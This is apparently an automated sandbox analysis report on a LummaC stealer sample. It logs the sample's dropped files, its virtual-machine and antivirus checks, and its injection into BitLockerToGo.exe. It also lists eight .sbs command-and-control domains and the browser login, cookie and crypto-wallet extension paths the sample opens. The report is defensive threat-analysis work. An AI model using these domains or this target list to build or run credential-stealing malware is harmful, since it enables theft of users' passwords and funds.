              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dllJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dllJump to dropped file
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dllJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1104Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECEECE0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECD647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECD647C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED03130 FindFirstFileExA,0_2_00007FF70ED03130
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF5134 VirtualQuery,GetSystemInfo,0_2_00007FF70ECF5134
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: 0JvPartitionType_VMWareUnknownW@
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: PartitionType_VMWareVMFS@
              Source: VBoxClient-x86.dll.0.dr, VBoxProxyStub-x86.dll.0.drBinary or memory string: AdditionsFacilityType_VBoxTrayClient
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: PartitionType_VMWareReserved@
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: aVmNetTx
              Source: Qt5GuiVBox.dllBinary or memory string: .?AVQEmulationPaintEngine@@H
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: aVmNetRx
              Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: VBoxProxyStub-x86.dll.0.drBinary or memory string: PartitionType_VMWareVMKCoreW@
              Source: Imperial_Delay.exe, 00000001.00000002.1878293373.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Qt5GuiVBox.dllBinary or memory string: .?AVQEmulationPaintEngine@@
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004442C0 LdrInitializeThunk,2_2_004442C0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECFAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECFAC68
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED041B0 GetProcessHeap,0_2_00007FF70ED041B0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF6B24 SetUnhandledExceptionFilter,0_2_00007FF70ECF6B24
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF70ECF5CE0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECFAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECFAC68
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70ECF6940

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: snailyeductyi.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ferrycheatyk.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deepymouthi.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wrigglesight.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: captaitwik.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sidercotay.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: heroicmint.sbs
              Source: Imperial_Delay.exe, 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: monstourtu.sbs
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2867008Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 449000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44C000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45C000Jump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECEECE0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ED08DF0 cpuid 0_2_00007FF70ED08DF0
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF70ECEDE44
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECF400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70ECF400C
              Source: C:\Users\user\Desktop\HLZwUhcJ28.exeCode function: 0_2_00007FF70ECD6768 GetVersionExW,0_2_00007FF70ECD6768
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000002.00000003.2023225773.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2022709028.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000002.00000003.2023225773.0000000002D1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
              Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000002.00000003.2010145588.0000000002CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
